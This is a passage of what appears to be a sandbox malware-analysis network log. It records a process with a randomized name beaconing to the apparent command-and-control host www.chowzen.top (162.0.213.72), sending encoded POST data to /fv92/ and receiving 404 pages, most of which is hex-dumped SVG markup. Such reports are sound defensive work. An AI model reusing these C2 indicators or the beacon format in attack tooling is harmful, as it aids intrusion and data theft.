                                      Data Ascii: terlimit="10" cx="588.977" cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /
                                      Jun 10, 2024 10:22:58.575961113 CEST212INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 31 33 2e 36 31 38 22 20 63 79 3d 22 34 38 32 2e 33 38 37 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: cx="413.618" cy="482.387" r="7.952" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fil
                                      Jun 10, 2024 10:22:58.580861092 CEST1236INData Raw: 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45
                                      Data Ascii: l="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620"


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.551400162.0.213.72802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:00.446290016 CEST731OUTPOST /fv92/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.chowzen.top
                                      Referer: http://www.chowzen.top/fv92/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 2f 4b 54 4f 63 49 52 78 33 35 38 53 32 31 6b 5a 34 52 4c 30 38 47 6b 31 31 65 79 36 72 54 37 49 6f 6a 70 55 30 57 2f 4b 36 50 30 64 67 44 63 6f 77 68 57 49 64 63 32 4f 2b 73 65 74 55 2f 4e 7a 69 38 42 4b 6c 5a 52 71 72 50 44 51 6b 69 38 54 59 76 65 36 74 6c 7a 37 74 75 5a 42 4d 55 43 74 6a 33 61 42 64 58 63 50 31 36 55 32 32 6a 78 36 54 4c 69 33 76 6b 32 48 6a 4d 51 34 7a 53 2b 77 46 7a 47 77 57 50 31 76 6e 43 2f 4a 4f 6a 70 57 68 34 47 33 75 4c 41 52 6e 67 41 45 48 79 6a 4d 48 71 6a 66 42 68 6d 72 50 69 61 49 42 33 6c 39 68 72 4e 4a 66 4a 67 70 55 37 2f 32 76 59 55 59 77 70 38 62 66 53 48 51 36 49 65 4c 59 47 63 30 45 67 30 46 35 37 75 51 45 4c 76 2b
                                      Data Ascii: TTv82Lg=/KTOcIRx358S21kZ4RL08Gk11ey6rT7IojpU0W/K6P0dgDcowhWIdc2O+setU/Nzi8BKlZRqrPDQki8TYve6tlz7tuZBMUCtj3aBdXcP16U22jx6TLi3vk2HjMQ4zS+wFzGwWP1vnC/JOjpWh4G3uLARngAEHyjMHqjfBhmrPiaIB3l9hrNJfJgpU7/2vYUYwp8bfSHQ6IeLYGc0Eg0F57uQELv+
                                      Jun 10, 2024 10:23:01.125991106 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:23:01 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                      Jun 10, 2024 10:23:01.126040936 CEST212INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461
                                      Jun 10, 2024 10:23:01.126220942 CEST1236INData Raw: 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                      Data Ascii: ,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                                      Jun 10, 2024 10:23:01.126236916 CEST1236INData Raw: 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20
                                      Data Ascii: .069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit
                                      Jun 10, 2024 10:23:01.126260996 CEST1236INData Raw: 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20
                                      Data Ascii: 3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-
                                      Jun 10, 2024 10:23:01.126276016 CEST1236INData Raw: 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64
                                      Data Ascii: " y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                      Jun 10, 2024 10:23:01.126292944 CEST1236INData Raw: 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69
                                      Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146"
                                      Jun 10, 2024 10:23:01.126308918 CEST1236INData Raw: 33 30 33 22 20 63 79 3d 22 33 35 33 2e 37 35 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32
                                      Data Ascii: 303" cy="353.753" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" s
                                      Jun 10, 2024 10:23:01.126349926 CEST1236INData Raw: 38 22 20 63 79 3d 22 35 34 34 2e 31 37 36 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 33 38 32 2e 35 31 35 22 20 63
                                      Data Ascii: 8" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="47
                                      Jun 10, 2024 10:23:01.126365900 CEST1236INData Raw: 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72
                                      Data Ascii: <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" strok
                                      Jun 10, 2024 10:23:01.131038904 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 72 6d 4c 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f
                                      Data Ascii: <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.551401162.0.213.72802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:03.082406044 CEST1748OUTPOST /fv92/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.chowzen.top
                                      Referer: http://www.chowzen.top/fv92/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 2f 4b 54 4f 63 49 52 78 33 35 38 53 32 31 6b 5a 34 52 4c 30 38 47 6b 31 31 65 79 36 72 54 37 49 6f 6a 70 55 30 57 2f 4b 36 50 38 64 67 51 6b 6f 78 43 2b 49 65 63 32 4f 7a 4d 65 75 55 2f 4e 55 69 38 70 4f 6c 5a 64 63 72 4d 72 51 6c 42 6b 54 4a 72 4b 36 30 31 7a 37 79 2b 5a 41 54 45 43 43 6a 33 4b 4e 64 58 4d 50 31 36 55 32 32 6c 64 36 58 5a 61 33 6f 55 32 45 6b 4d 51 38 69 43 2b 4d 46 33 6a 4c 57 50 68 52 79 69 66 4a 4e 41 52 57 79 39 79 33 73 72 41 54 67 67 41 71 48 79 66 54 48 75 44 31 42 6c 75 56 50 6c 57 49 42 51 68 72 2b 5a 64 76 41 35 6c 4b 62 71 37 46 7a 38 35 30 37 61 55 4d 55 42 54 79 2b 63 44 68 51 6d 34 72 51 6a 78 36 6a 38 6e 43 47 39 43 68 4e 42 42 4e 65 74 6b 35 4a 51 4b 4b 62 45 35 77 50 4b 45 72 76 34 30 48 56 54 6f 55 35 2b 46 6b 53 61 76 31 38 2b 2b 4e 74 4d 4f 45 44 71 67 47 57 50 58 68 67 44 6b 30 79 4b 4c 57 50 34 74 74 56 50 79 32 45 41 69 54 45 49 69 49 50 48 55 4d 31 69 2b 5a 46 44 73 45 66 46 37 65 65 67 68 58 51 45 4c 39 32 6b 39 55 7a 65 59 32 4d 78 [TRUNCATED]
                                      Data Ascii: TTv82Lg=/KTOcIRx358S21kZ4RL08Gk11ey6rT7IojpU0W/K6P8dgQkoxC+Iec2OzMeuU/NUi8pOlZdcrMrQlBkTJrK601z7y+ZATECCj3KNdXMP16U22ld6XZa3oU2EkMQ8iC+MF3jLWPhRyifJNARWy9y3srATggAqHyfTHuD1BluVPlWIBQhr+ZdvA5lKbq7Fz8507aUMUBTy+cDhQm4rQjx6j8nCG9ChNBBNetk5JQKKbE5wPKErv40HVToU5+FkSav18++NtMOEDqgGWPXhgDk0yKLWP4ttVPy2EAiTEIiIPHUM1i+ZFDsEfF7eeghXQEL92k9UzeY2MxWfqw12qcCNgCnmy7UIlOamAKVPTBwx0c0dNWcldzT1vy7CAuPOQzCX1oel2qWaF2hk9ggEhqPuiGtcB7TjgMiSCBH6vjMIfq5TWeBYll+fXETVb7tnhb2vUh3+qBHq1m2g8m/Xx/YsePD6zlzIVdw9fB3OKWHkLeWmsYVmTjForOUUFQHvGHwtazuIwi+w7UlpsPe2RXXmPligJXvP8eQ6B6xhKJgRHyvC2zpwujy62nlGXPu782XDJ2vVRnfLgQaX5tcRCC85py8kPIiInNWE1j0jfIg2GnJMfYYFuJXibNbe8AyFCCmc8O7vJHmTPGAW7kb/l2eCr6htfpfm5i3sF7PJnFqgov51Om5f0XA0HbaS+lLo8QBmSAstc5Y3C2VMvRDOaMqb2lucbSSwXbAwUuDXsaAwuHPx93DQYKAuPT0+lLdh3tMzZx+7wHlYsskaFdEwristjBpGdt/aBtzwmbWdQKbIBcYyfp6LVyUfLjJ3+55IseNg3QWPrqaqodUN2UcotozwUsOjuHL/P0KoE9TwFdPu0Cemz4icy5Xtts6nR/bCrDBCdw85CqCE9VFEIQgvhJ0NNqBPuOZIBSOfuzMGf7vQSUiW2r42nfDH82VG4WrEx4zQsXk03RqM3vMyxE6OkoBA7V5x7BEq9AYrRyHbd4Afe0Px [TRUNCATED]
                                      Jun 10, 2024 10:23:03.746912956 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:23:03 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                      Jun 10, 2024 10:23:03.746958971 CEST212INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461
                                      Jun 10, 2024 10:23:03.747015953 CEST1236INData Raw: 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                      Data Ascii: ,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                                      Jun 10, 2024 10:23:03.747051001 CEST1236INData Raw: 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20
                                      Data Ascii: .069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit
                                      Jun 10, 2024 10:23:03.747108936 CEST1236INData Raw: 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20
                                      Data Ascii: 3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-
                                      Jun 10, 2024 10:23:03.747142076 CEST636INData Raw: 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64
                                      Data Ascii: " y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                      Jun 10, 2024 10:23:03.747175932 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65
                                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" />
                                      Jun 10, 2024 10:23:03.747205019 CEST212INData Raw: 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20
                                      Data Ascii: .146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mi
                                      Jun 10, 2024 10:23:03.747237921 CEST1236INData Raw: 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 35 38 38 2e 39 37 37 22 20 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: terlimit="10" cx="588.977" cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /
                                      Jun 10, 2024 10:23:03.747272015 CEST212INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 31 33 2e 36 31 38 22 20 63 79 3d 22 34 38 32 2e 33 38 37 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: cx="413.618" cy="482.387" r="7.952" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fil
                                      Jun 10, 2024 10:23:03.752317905 CEST1236INData Raw: 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45
                                      Data Ascii: l="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620"


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.551402162.0.213.72802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:05.760710001 CEST454OUTGET /fv92/?TTv82Lg=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:06.427530050 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:23:06 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
